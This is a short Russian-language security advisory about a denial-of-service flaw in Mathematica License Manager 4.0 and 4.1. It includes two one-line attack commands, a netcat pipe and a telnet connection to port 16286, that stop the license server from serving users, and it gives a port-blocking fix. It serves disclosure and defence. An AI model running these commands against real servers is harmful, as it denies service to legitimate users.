DoS для Mathematica

Дата публикации:
01.08.2001
Дата изменения:
17.10.2006
Всего просмотров:
830
Опасность:
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Описание:

Уязвимость защиты в Mathematica позволяет нападавшим заставлять программу прекращать обслуживать лицензии легетивным пользователям. Уязвимость позволяет нападавшим вызывать отказ в обслуживании(DoS).



Если сервер лицензии - licenseserver.example.com и nc - netcat, достаточно набрать:

cat /dev/null | nc licenseserver.example.com 16286

или

telnet licenseserver.example.com 16286

Кроме того, сервер не будет отвечать ни на какие другие просьбы о лицензиях. Для устранения нужно запретить все пакеты, адресованные 16286 порту.

Уязвимость работает в:

Mathematica License Manager version 4.0

Mathematica License Manager version 4.1
 


или введите имя

CAPTCHA